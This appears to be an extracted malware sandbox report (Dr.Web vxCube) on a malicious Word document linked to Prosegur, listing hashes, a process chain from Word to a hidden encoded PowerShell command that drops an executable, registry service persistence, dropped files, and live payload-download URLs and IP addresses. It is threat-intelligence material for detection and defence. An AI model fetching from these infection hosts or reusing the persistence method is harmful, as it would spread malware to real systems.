Prosegur Ioc Virustotal
Size 226.3 KB
Format DOC
SHA1 2e7587c911694df2230b58df19f5295cc556cfb5
Behavior
Malicious: Launching a process by exploiting the app vulnerability · Sending an HTTP GET request to an infection source
Process graph (legend: sample, known threat, malicious module, process creation, injection, web query, RPC request; process maliciousness scale 1–100). Nodes: winword.exe:2764, powershell.exe:876, 216.exe:3016, hope.ic....org:80 (TCP/IP)
PID 2764
Full path %ProgramFiles%\microsoft office\office14\winword.exe
Run parameters /n "<PATH_SAMPLE>.doc"
Behavior Creating a window
Description
[<HKLM>\SOFTWARE\CLASSES\Spiro.Document\shell\open\command] '' = '%WINDIR%\SysWOW64\SCALAR~1.EXE "%1"'
[<HKLM>\System\CurrentControlSet\Services\scalarbuilder] 'Start' = '00000002'
[<HKLM>\System\CurrentControlSet\Services\scalarbuilder] 'ImagePath' = '"%WINDIR%\SysWOW64\scalarbuilder.exe"'
http://hope.icrisat.org/wp-snapshots/d376u2wop-ygs9lfy-56/
http://190.195.148.163/results/ringin/ringin/merge/
UDP
'%HOMEPATH%\216.exe'
'%WINDIR%\syswow64\scalarbuilder.exe'
'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD '[base64-encoded command omitted]' (with hidden window)
https://vtbehaviour.commondatastorage.googleapis.com/b723c820434ff6cf159518371f9c598dc94d80a5b19a34ba13683dc2b4b563e9_Dr.Web vxCube.html?Go… 4/9
11/27/2019 vxCube — Report
'%WINDIR%\splwow64.exe' 16384
%APPDATA%\microsoft\templates\normal.dotm  92a6f1190f833f155b40d97e2287a9516c7035c1  —
%APPDATA%\microsoft\windows\recent\customdestinations\590aee7bdd69b59b.customdestinations-ms  cac439e385e2b8faef5a041804afc628e71fe0db  —
%APPDATA%\microsoft\windows\recent\customdestinations\969252ce11249fdd.customdestinations-ms  adf35643787affe1afb840f0999bf9e679c7ca86  —
%APPDATA%\microsoft\windows\recent\customdestinations\969252ce11249fdd.customdestinations-ms~rf16d17d.tmp  adf35643787affe1afb840f0999bf9e679c7ca86  —
%APPDATA%\microsoft\windows\recent\customdestinations\aq3c0sp0xo03mjw7sbwq.temp  cac439e385e2b8faef5a041804afc628e71fe0db  —
%APPDATA%\microsoft\windows\recent\customdestinations\jhn0k7tyon9s8fzsiqli.temp  adf35643787affe1afb840f0999bf9e679c7ca86  —
%HOMEPATH%\216.exe  281f0b8bce96c27d12bbce931079bb77e6c7df13  —
%LOCALAPPDATA%\gdipfontcachev1.dat  c5cc6b48b8a50ef3cd8a3603253670aa9ee8494f  —
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.mso\233fcb2a.wmf  8095738d4cb2c6cd77d02b3d4cd2609196cfc354  —
%LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.mso\2d64e985.wmf  8095738d4cb2c6cd77d02b3d4cd2609196cfc354  —
API log [640]
Time Process Event Arguments
IP 200.109.58.183:443 —